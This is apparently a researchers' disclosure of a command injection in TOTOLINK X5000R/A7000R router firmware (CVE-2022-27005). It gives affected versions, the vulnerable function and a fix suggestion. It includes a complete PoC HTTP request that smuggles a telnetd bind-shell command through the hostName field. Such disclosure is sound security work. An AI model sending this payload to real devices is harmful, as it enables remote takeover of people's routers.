CVE-2022-27005: my_vuln/30.md at main · wudipjq/my_vuln

TOTOLINK Vulnerability

Vendor:TOTOLINK

Product:X5000R,A7000R

Version:X5000R_Firmware(V9.1.0u.6118_B20201102)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/218/ids/36.html)

A7000R_Firmware(V9.1.0u.6115_B20201022)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/171/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng,Mengjie Sun,Jingfei Bian

Institution:[email protected],[email protected],[email protected]

Vulnerability description

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Execution

In cstecgi.cgi binary:

In setWanCfg function, hostName is directly passed by the attacker, so we can control the hostName to attack the OS.

Supplement

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set hostName as ‘;telnetd -l /bin/sh -p 8888;’ , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 185 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/basic/wan.html?time=1646750305946 Cookie: SESSION_ID=2:1646750253:2

{"hostName":"’;telnetd -l /bin/sh -p 8888;’","dhcpMtu":"1500","proto":1,"dnsMode":"0","ttlWay":"1","lcpEchoEnable":"1","clone":0,"cloneMac":"5C:92:5E:9B:EC:E1","topicurl":"setWanCfg"}

Result

Get a shell!